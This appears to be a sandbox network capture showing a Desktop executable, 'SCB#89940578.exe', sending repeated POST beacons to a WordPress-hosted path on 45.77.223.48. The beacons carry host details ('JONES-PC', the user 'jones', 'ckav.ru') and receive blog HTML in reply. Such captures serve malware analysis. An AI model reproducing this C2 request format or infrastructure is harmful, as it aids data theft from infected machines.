Apr 26, 2024 04:42:42.984630108 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:42.984886885 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:42.984939098 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:42.984998941 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:42:42.985074997 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49768	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:43.312556028 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:43.502001047 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:44.455298901 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:43 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:44.455429077 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:44.455666065 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:44.472052097 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:44.475182056 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:44.475312948 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:44.475519896 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:44.475617886 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:44.475699902 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:44.475775957 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49769	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:44.797094107 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:44.985744953 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:45.872083902 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:44 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:45.872117996 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:45.872133970 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:45.889679909 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:45.890809059 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:45.894707918 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:45.894797087 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:45.894941092 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:45.894994020 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:45.895092010 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49770	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:46.212974072 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:46.400558949 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:47.326965094 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:46 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:47.327075958 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:47.327202082 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:47.340939045 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:47.344851971 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:47.344959021 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:47.345092058 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:47.345266104 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:47.345349073 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:47.345377922 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49771	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:47.670237064 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:47.859134912 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:48.762094975 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:47 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:48.762229919 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:48.771694899 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:48.772346020 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:48.772384882 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:48.772443056 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:48.772559881 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:48.772609949 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:48.772713900 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:42:48.772761106 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49772	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:49.953965902 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
